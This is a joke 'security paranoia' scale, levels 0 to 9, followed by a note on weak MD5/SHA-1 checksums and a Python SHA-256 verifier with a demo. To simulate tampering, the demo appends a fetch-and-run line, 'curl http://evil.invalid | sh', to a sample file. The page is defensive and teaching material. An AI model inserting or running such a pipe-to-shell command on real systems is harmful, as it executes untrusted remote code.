Security Paranoia Scale
Just like the Beaufort wind scale... but for security.
In the early 19th century a wind scale was devised and later standardised so that naval officers recording wind speeds in their ships' logs could describe the weather consistently. The problem at the time was that what one officer would call "calm", another might call "windy". Until the scale existed, there was no way of comparing the logs of two different captains.
A similar problem appears in digital security. What one person might call "safe", another might call "already exploited". Many security experts, tongues firmly in cheeks, will say that "a healthy amount of paranoia is necessary to remain secure online". This scale is an attempt to quantify levels of security paranoia and provide an easy method for identifying them.
| Security Paranoia Number | Name | Description |
|---|---|---|
| 0 | Free and easy | Leaves door to house open. Writes PIN on credit card. Doesn't believe in having computer passwords. When forced to choose a password, chooses '12345'. Double clicks all attachments in email. Clicks on "Hundreds of new Smileys!" ads. Installs Bonzi Buddy. |
| 1 | | Locks front door of house. Memorises PIN but keeps original letter in filing cabinet 'just in case'. Usual password is 'password'. When IT enforce a more complex password, writes it on a sticky note and sticks it to the monitor. Never changes the default password on any device. |
| 2 | | Locks every door of house. Memorises PIN and throws away original letter. Every user account has admin privileges. Uses the same password for every login, on every system. Usual password is the dog's name. |
| 3 | | Locks windows of house too. Memorises PIN and eats original letter. Only one user on the computer has admin privileges. Uses two different passwords: one for safe places and one for everywhere else. Usual password is a dictionary word. Knows that pictures of locks on web sites mean that the site is secure. |
| 4 | | Hasn't logged in as admin since the initial install. Issues admin commands using sudo or Run As. Uses open source software because he understands it has a good security record, but still uses proprietary software when needed. Has three different levels of passwords: low, medium and high security. Usual password is a dictionary word with a number. Knows what each web browser's lock symbol for SSL looks like. |
| 5 | | Exclusively uses open source software because it can be verified by the community not to contain backdoor code and security flaws. Encrypts and signs sensitive emails. Won't submit a password to any web site unless it is using SSL. Uses sudo, but it requires a password every time it is used. Usual password is at least 6 random letters and numbers. |
| 6 | | Checks MD5 sums of downloaded software to make sure it hasn't been tampered with. Only uses two different password security levels, but uses a different password for everything in the high security level. Requires a password to unlock the screen saver. Encrypts and signs all emails. Actually reads the SSL certificate information in the web browser before accepting a certificate. Usual password is at least 8 random letters and numbers. |
| 7 | | Compiles own open source software and checks MD5 sums of the downloaded source files. Screen saver activates after 5 minutes of inactivity. Encrypts entire home directory. Has a hardware random number generator based on radioactive decay attached to the computer. Phones web site owners to verify the SSL certificate fingerprint verbally. Usual password is at least 10 random letters, symbols and numbers. |
| 8 | | Compiles own open source software, but only after doing a complete security audit on every line of code. Invents own encryption algorithm because existing ones aren't good enough. Uses a different password for every authentication. Screen saver activates after 30 seconds of inactivity. Usual password is at least 30 random letters, symbols and numbers. |
| 9 | I have no name. | Lives in abandoned security bunker from World War II in a remote desert. Must authenticate before using the toaster. All passwords require modification from a randomly changing security device that updates every 30 seconds. Every authentication requires three-factor authentication: a dongle plugged into the computer, a password and a biometric scan. Never removes sunglasses or gloves outside the bunker, to keep biometric information secret. Computer requires re-authentication every 30 seconds, regardless of activity. Encrypts home directory with a one-time pad... that only ever existed inside his brain. Has a self-destruct button installed in underground lair. |
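Levels 6 and 7 check MD5 sums of downloads. The habit is sound, the algorithm is not: MD5 (and SHA-1) have practical collision attacks, so a publisher, or anyone who can swap the file before the checksum is produced, can make two different files share a digest. A checksum file served next to the download also only catches corruption or tampering in transit; if the server itself is compromised the attacker rewrites both, which is what the signatures at level 5 are for. The following checksum verifier is an added example written for this page, not code from the original; the release file, its name and the tampering payload are all constructed here. It parses coreutils-style `sha256sum` output, streams the file through the hash, and refuses MD5 or SHA-1 unless the caller opts in.

```python
import hashlib
import hmac
import os
import tempfile

# Algorithms with practical collision attacks: whoever controls the original
# file can prepare two versions with the same digest.
WEAK_ALGOS = {"md5", "sha1"}

# Constructed sample "download" (a hypothetical release script, not a real one).
SAMPLE_NAME = "release-1.0.sh"
SAMPLE_CONTENT = b"#!/bin/sh\necho 'hello from a hypothetical release'\n"


def parse_sums(text):
    """Parse coreutils-style checksum lines ("<hex>  <name>" or "<hex> *<name>")
    into {name: hexdigest}. Blank lines and '#' comments are skipped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue  # malformed line: ignore rather than guess
        digest, name = parts
        entries[name.lstrip("*")] = digest.lower()
    return entries


def hash_file(path, algo, chunk_size=1 << 16):
    """Stream the file through the hash so a large download need not fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def verify(path, sums_text, algo="sha256", allow_weak=False):
    """Return True iff the file's digest matches the checksum-file entry for its
    basename. MD5 and SHA-1 are refused unless the caller opts in explicitly."""
    if algo in WEAK_ALGOS and not allow_weak:
        raise ValueError(f"{algo} is not collision-resistant; use sha256 or stronger")
    name = os.path.basename(path)
    expected = parse_sums(sums_text).get(name)
    if expected is None:
        raise KeyError(f"no checksum entry for {name}")
    # Constant-time comparison: cheap insurance even though the digest is public.
    return hmac.compare_digest(hash_file(path, algo), expected)


def demo():
    """Constructed end-to-end run: the pristine file verifies, a tampered copy
    fails, and an MD5 check is refused by default. Returns (good, tampered, refused)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, SAMPLE_NAME)
        with open(path, "wb") as f:
            f.write(SAMPLE_CONTENT)
        # The publisher's SHA256SUMS file, computed here from the pristine content.
        sums = f"{hashlib.sha256(SAMPLE_CONTENT).hexdigest()}  {SAMPLE_NAME}\n"
        good = verify(path, sums)
        with open(path, "ab") as f:
            f.write(b"curl http://evil.invalid | sh\n")  # simulated tampering
        tampered = verify(path, sums)
        try:
            verify(path, sums, algo="md5")
            refused = False
        except ValueError:
            refused = True
    return good, tampered, refused


if __name__ == "__main__":
    print(demo())  # (True, False, True)
```

In practice the checksum file should be fetched over a different channel from the download, or carry a detached signature whose key you already trust; otherwise the verifier only proves that the file you got matches the file the server chose to give you.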
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.